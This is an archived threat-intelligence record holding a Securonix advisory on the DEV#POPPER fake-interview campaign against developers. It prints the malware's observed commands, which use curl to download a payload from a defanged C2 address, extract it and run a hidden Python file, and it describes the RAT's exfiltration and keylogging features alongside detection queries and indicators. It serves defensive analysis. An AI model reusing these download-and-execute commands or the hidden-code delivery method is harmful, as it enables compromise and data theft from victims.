{
	"id": "f4714550-f7c9-4635-aac7-6865f2a57fcc",
	"created_at": "2026-04-06T00:10:55.214701Z",
	"updated_at": "2026-04-10T03:28:28.680487Z",
	"deleted_at": null,
	"sha1_hash": "cd9fa509df0435268d6fed4c34cd4409bafd46fa",
	"title": "Analysis of DEV#POPPER: New Attack Campaign Targeting Software Developers Likely Associated With North Korean Threat Actors",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 424006,
	"plain_text": "Analysis of DEV#POPPER: New Attack Campaign Targeting\r\nSoftware Developers Likely Associated With North Korean Threat\r\nActors\r\nArchived: 2026-04-02 10:54:23 UTC\r\nSecuronix Threat Research Security Advisory – Fast Track/Early-Warning Coverage Advisory\r\n(FCA)\r\nBy Securonix Threat Research: D.Iuzvyk, T. Peck, O.Kolesnikov\r\nApr 24, 2024\r\ntldr:\r\nThe Securonix Threat Research Team has been monitoring a new ongoing social engineering attack campaign\r\n(tracked by STR as DEV#POPPER) likely associated with North Korean threat actors who are targeting developers\r\nusing fake interviews to deliver a Python-based RAT.\r\nhttps://www.securonix.com/blog/analysis-of-devpopper-new-attack-campaign-targeting-software-developers-likely-associated-with-north-korean-threat-actors/\r\nPage 1 of 12\n\nThe Threat Research team has been investigating a new threat campaign (tracked by STR as DEV#POPPER) that’s\r\nbeen targeting software developers. STR has been able to identify malicious software repositories used by attackers\r\nas part of the attack campaign, which we’ll delve deeper into to get a better understanding as to how the malicious\r\nthreat actors infect systems and their capabilities.\r\nIntroduction\r\nSocial engineering is an advanced tactic used by threat actors to manipulate individuals into divulging confidential\r\ninformation or performing actions that they might normally not. The attacker’s goal is to trick the user into\r\nunknowingly compromising themselves or place of employment. Unlike traditional hacking methods which rely on\r\nexploitation, social engineering targets human vulnerabilities by exploiting psychological manipulation. This\r\nmethod plays on basic human traits such as trust, fear or the desire to simply be helpful.\r\nIn the case of the DEV#POPPER attack campaign we’ve been observing, an interesting form of social engineering\r\nwas noted which involves the targeting of specific professional groups such as software developers. This technique,\r\nwhile not extremely prevalent at the moment, is still ongoing and has been reported a number of times in the past\r\nby North Korean threat actors.\r\nIn summary, an example of this is where attackers set up fake job interviews for developers, pretending to be\r\nlegitimate job interviewers. During these fraudulent interviews, the developers are often asked to perform tasks that\r\nhttps://www.securonix.com/blog/analysis-of-devpopper-new-attack-campaign-targeting-software-developers-likely-associated-with-north-korean-threat-actors/\r\nPage 2 of 12\n\ninvolve downloading and running software from sources that appear legitimate, such as GitHub. The software\r\ncontained a malicious Node JS payload that, once executed, compromised the developer’s system.\r\nThis method is effective because it exploits the developer’s professional engagement and trust in the job application\r\nprocess, where refusal to perform the interviewer’s actions could compromise the job opportunity. The attackers\r\ntailor their approach to appear as credible as possible, often by mimicking real companies and replicating actual\r\ninterview processes. This guise of professionalism and legitimacy lulls the target into a false sense of security,\r\nmaking it easier to deploy malware without arousing suspicion.\r\nNote – At the time of publication, the attackers GitHub repositories we analyze below have already been deleted.\r\nHowever, members of the cybersecurity community have picked up on other GitHub hosted samples as well.\r\nStage 1: Malicious Node.js Project\r\nThe first stage involves downloading or cloning git project from GitHub which would have been sent to the\r\ninterviewee from the interviewer. The zip archive contains a legitimate looking Node.js project containing a\r\nREADME.md.\r\nBuried in the Backend directory was a single JavaScript file which on the surface appears to be part of legit node.js\r\nproject using Mongoose, which is a Node.js package that provides MongoDB object modeling in an asynchronous\r\nenvironment. \r\nhttps://www.securonix.com/blog/analysis-of-devpopper-new-attack-campaign-targeting-software-developers-likely-associated-with-north-korean-threat-actors/\r\nPage 3 of 12\n\nFigure 1: imageDetails.js – unusually long scroll bar\r\nHowever, closer examination reveals a huge line of highly obfuscated code when scrolling way over to the right.\r\nAn example of how large this is can be seen by looking at the scrollbar in the figure above. The gif in  the figure\r\nbelow also demonstrates this as you can see the obfuscated code past a large comment block on the right.\r\nhttps://www.securonix.com/blog/analysis-of-devpopper-new-attack-campaign-targeting-software-developers-likely-associated-with-north-korean-threat-actors/\r\nPage 4 of 12\n\nFigure 2: Video highlighting the malicious JavaScript code out of view\r\nRemoving the JavaScript code from imageDetails.js and placing it into its own file allows us to analyze it a bit\r\neasier. The  is obfuscated using several layers of obfuscation including base64 and variable substitutions.\r\nhttps://www.securonix.com/blog/analysis-of-devpopper-new-attack-campaign-targeting-software-developers-likely-associated-with-north-korean-threat-actors/\r\nPage 5 of 12\n\nFigure 3: Extracted obfuscated JavaScript  code from imageDetails.js.\r\nStage 2: Command execution and payload download\r\nWhen the victim eventually run node.js project, the malicious JavaScript code in Stage 1 is executed through the\r\nNodeJS process (node.exe). The purpose of the malicious script in Stage 1 is simply to download and extract an\r\narchive file, extract it and then execute the next stage.\r\nThrough the node.exe process we observed the following commands:\r\nCommand Purpose\r\ncmd.exe /d /s /c “curl -lo “C:\\Users\\\r\n[REDACTED]\\AppData\\Local\\Temp\\p.zi”\r\nDownload next stage payload\r\n“p.zi”\r\nhttps://www.securonix.com/blog/analysis-of-devpopper-new-attack-campaign-targeting-software-developers-likely-associated-with-north-korean-threat-actors/\r\nPage 6 of 12\n\n“hxxp://147.124.214[.]131:1244/pdown”\r\ntar -xf C:\\Users\\[REDACTED]\\AppData\\Local\\Temp\\p2.zip -c c:\\users\\\r\n[REDACTED]”\r\nUsing the tar command, extract zip\r\nfile into the user’s temp directory\r\ncmd.exe /d /s /c “”c:\\users\\[REDACTED]\\.pyp\\python.exe” “c:\\users\\\r\n[REDACTED]\\.npl”\r\nRun python.exe and execute the\r\nhidden file which was just\r\nextracted “.npl”\r\nStage 3: Python code execution – .npl\r\nThe “.npl” file is technically a Python file, without an extension and uses a starting dot “.” to indicate to the\r\noperating system that it is a hidden file. This may or may not be hidden from view to the user depending on their\r\noperating system settings.\r\nThe file contains a large base64 payload and uses a combination of string manipulation and decoding to execute the\r\nPython code hidden inside of it. Base64 encoding and XOR logic are used for the content behind the hidden string.\r\nThis is then executed as Python code using exec().\r\nhttps://www.securonix.com/blog/analysis-of-devpopper-new-attack-campaign-targeting-software-developers-likely-associated-with-north-korean-threat-actors/\r\nPage 7 of 12\n\nFigure 4: Python execution .npl file contents\r\nThe decoded result contains several key variables such as its current path and a hard-coded C2 server: \r\nhxxp://147.124.214[.]131:1244. The Python script then calls and executes another Python script which is located at\r\nC:\\Users\\Redacted\\.n2/pay.\r\nStage 3: Python code execution – pay\r\nThe “pay” script is also an extensionless file similar to the first Python script we analyzed. This next script contains\r\nsimilar payload execution tactics where a Base64 string is decoded in the same fashion, however two unique strings\r\nare executed. Each of these can be seen in the figure below.\r\nhttps://www.securonix.com/blog/analysis-of-devpopper-new-attack-campaign-targeting-software-developers-likely-associated-with-north-korean-threat-actors/\r\nPage 8 of 12\n\nFigure 5: res – Python file contents\r\nThe first decoded code string executes and gathers system and network information from an infected computer and\r\nthen sends this data to a remote server which includes the following:\r\nOperating system type\r\nHostname\r\nOS release version\r\nOS version\r\nUsername of the logged-in user\r\nA unique identifier for the device (uuid) generated by hashing the MAC address and username\r\nThis information is gathered and then transmitted in a JSON-like format back to the attacker’s C2 server by issuing\r\na carefully crafted HTTP POST request.\r\nhttps://www.securonix.com/blog/analysis-of-devpopper-new-attack-campaign-targeting-software-developers-likely-associated-with-north-korean-threat-actors/\r\nPage 9 of 12\n\nThe second decoded and executed string is much longer than the first and contains quite a bit more functionality.\r\nOnce executed, the script functions similarly to a RAT (Remote Access Trojan), allowing the attacker to interact\r\nwith the victim’s machine remotely. After analyzing the decoded portion of the script, we observed the following\r\ncapabilities:\r\nNetworking and session creation: Used for persistent connections: This establishes persistent TCP\r\nconnections including structuring and sending JSON formatted data.\r\nFile system interaction: Contains functions to traverse directories and filter files based on specific\r\nextensions and directories to exclude. It can also locate and potentially exfiltrate files that do not match\r\ncertain criteria (like file size and extension).\r\nRemote command execution: The script contains several functions which allow for the execution of\r\nsystem shell commands and scripts.. This includes browsing the filesystem and executing shell commands.\r\nData Handling and transmission: Functionality for encoding data over an established TCP connection. It\r\nhandles data reception, decoding different character encodings and manages transmission errors and\r\ntimeouts.\r\nExfiltration and uploading: For exfiltration,the Python script is able to send files to a remote FTP server\r\nwith the ability to filter in or out files based on its extension. Other functions exist to help automate this\r\nprocess by collecting data from various user directories like Documents and Downloads.\r\nClipboard and keystroke logging: The script includes capabilities to monitor and exfiltrate clipboard\r\ncontents and keystrokes.\r\nSecuronix recommendations\r\nWhen it comes to attacks which originate through social engineering, it’s critical to maintain a security-focused\r\nmindset, especially during intense and stressful situations like job interviews. The attackers behind the\r\nDEV#POPPER campaigns abuse this, knowing that the person on the other end is in a highly distracted and in a\r\nmuch more vulnerable state.  When it comes to prevention and detection, the Securonix Threat Research team\r\nrecommends:\r\nRaise awareness to the fact that people are targets of social engineering attacks just as technology is\r\nexploitation. Remaining extra vigilant and security continuous, even during high-stress situations is critical\r\nto preventing the issue altogether.\r\nIn case of code execution, monitor common malware staging directories, especially script-related activity in\r\nworld-writable directories. In the case of this campaign the threat actors staged in subdirectories found in\r\nthe user’s %APPDATA% directory.\r\nMonitor for the usage of non-default scripting languages such as Python on endpoints and servers which\r\nshould normally not execute it. To assist in this, leverage additional process-level logging such as Sysmon\r\nand PowerShell logging for additional log detection coverage.\r\nSecuronix customers can scan endpoints using the Securonix hunting queries below.\r\nMITRE ATT\u0026CK Matrix\r\nTactics Techniques\r\nhttps://www.securonix.com/blog/analysis-of-devpopper-new-attack-campaign-targeting-software-developers-likely-associated-with-north-korean-threat-actors/\r\nPage 10 of 12\n\nCollection T1560: Archive Collected Data\r\nCommand and Control T1132: Data Encoding\r\nDefense Evasion\r\nT1027.010: Obfuscated Files or Information: Command Obfuscation\r\nT1070.004: Indicator Removal: File Deletion\r\nDiscovery\r\nT1033: System Owner/User Discovery\r\nT1082: System Information Discovery\r\nExecution\r\nT1059.001: Command and Scripting Interpreter: PowerShell\r\nT1059.003: Command and Scripting Interpreter: Windows Command Shell\r\nT1059.006: Command and Scripting Interpreter: Python\r\nExfiltration T1041: Exfiltration Over C2 Channel\r\nRelevant provisional Securonix detections\r\nEDR-ALL-930-RU\r\nEDR-ALL-1246-RU\r\nNGF-ALL-833-ER\r\nRelevant hunting queries\r\n(remove square brackets “[ ]” for IP addresses or URLs)\r\nindex = activity AND rg_functionality = “Web Proxy” AND (destinationaddress = “147.124.214[.]131” OR\r\ndestinationaddress = “173.211.106[.]101”)\r\nindex = activity AND rg_functionality = “Next Generation Firewall” AND  (destinationaddress =\r\n“147.124.214[.]131” OR destinationaddress = “173.211.106[.]101”)\r\nindex = activity AND rg_functionality = “Endpoint Management Systems” AND (deviceaction = “Network\r\nconnection detected” OR deviceaction = “Network connection detected (rule: NetworkConnect)”) AND\r\ndestinationport=”1244″)\r\nindex = activity AND rg_functionality = “Endpoint Management Systems” AND (deviceaction = “Process\r\nCreate” OR deviceaction = “Process Create (rule: ProcessCreate)” OR deviceaction = “ProcessRollup2” OR\r\ndeviceaction = “Procstart” OR deviceaction = “Process” OR deviceaction = “Trace Executed Process”)\r\nAND destinationprocessname ENDS WITH “python.exe” AND (destinationprocessname ENDS WITH\r\n“cmd.exe” OR destinationprocessname ENDS WITH “powershell.exe”)\r\n(change the first destinationprocessname to sourceprocessname)\r\nC2 and infrastructure\r\nhttps://www.securonix.com/blog/analysis-of-devpopper-new-attack-campaign-targeting-software-developers-likely-associated-with-north-korean-threat-actors/\r\nPage 11 of 12\n\nC2 Address\r\n147.124.214[.]131\r\n173.211.106[.]101\r\nAnalyzed files/hashes\r\nFile Name SHA256\r\nsports_platform_app-main.zip\r\n45c991529a421104f2edf03d92e01d95774bf54325f9107dd4139505912a0c1e\r\nimageDetails.js 33617F0AC01A0F7FA5F64BD8EDEF737F678C44E677E4A2FB23C6B8A3BCD39FA2\r\n.npl F9CA12321FB91157CCE8513E935810D1C2005AB0739322B474F0CB4AF2605D16\r\npay 977A9024962102B02128D391C0543C63328D3F26701ECA1A5D282AF4D493DC2E\r\nReferences:\r\n1. Hacking Employers and Seeking Employment: Two Job-Related Campaigns Bear Hallmarks of North\r\nKorean Threat Actors\r\nhttps://unit42.paloaltonetworks.com/two-campaigns-by-north-korea-bad-actors-target-job-hunters/\r\nSource: https://www.securonix.com/blog/analysis-of-devpopper-new-attack-campaign-targeting-software-developers-likely-associated-with-nort\r\nh-korean-threat-actors/\r\nhttps://www.securonix.com/blog/analysis-of-devpopper-new-attack-campaign-targeting-software-developers-likely-associated-with-north-korean-threat-actors/\r\nPage 12 of 12",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"ETDA",
		"MITRE"
	],
	"references": [
		"https://www.securonix.com/blog/analysis-of-devpopper-new-attack-campaign-targeting-software-developers-likely-associated-with-north-korean-threat-actors/"
	],
	"report_names": [
		"analysis-of-devpopper-new-attack-campaign-targeting-software-developers-likely-associated-with-north-korean-threat-actors"
	],
	"threat_actors": [
		{
			"id": "4fc99d9b-9b66-4516-b0db-520fbef049ed",
			"created_at": "2025-10-29T02:00:51.949631Z",
			"updated_at": "2026-04-10T02:00:05.346203Z",
			"deleted_at": null,
			"main_name": "Contagious Interview",
			"aliases": [
				"Contagious Interview",
				"DeceptiveDevelopment",
				"Gwisin Gang",
				"Tenacious Pungsan",
				"DEV#POPPER",
				"PurpleBravo",
				"TAG-121"
			],
			"source_name": "MITRE:Contagious Interview",
			"tools": [
				"InvisibleFerret",
				"BeaverTail",
				"XORIndex Loader",
				"HexEval Loader"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775434255,
	"ts_updated_at": 1775791708,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/cd9fa509df0435268d6fed4c34cd4409bafd46fa.pdf",
		"text": "https://archive.orkl.eu/cd9fa509df0435268d6fed4c34cd4409bafd46fa.txt",
		"img": "https://archive.orkl.eu/cd9fa509df0435268d6fed4c34cd4409bafd46fa.jpg"
	}
}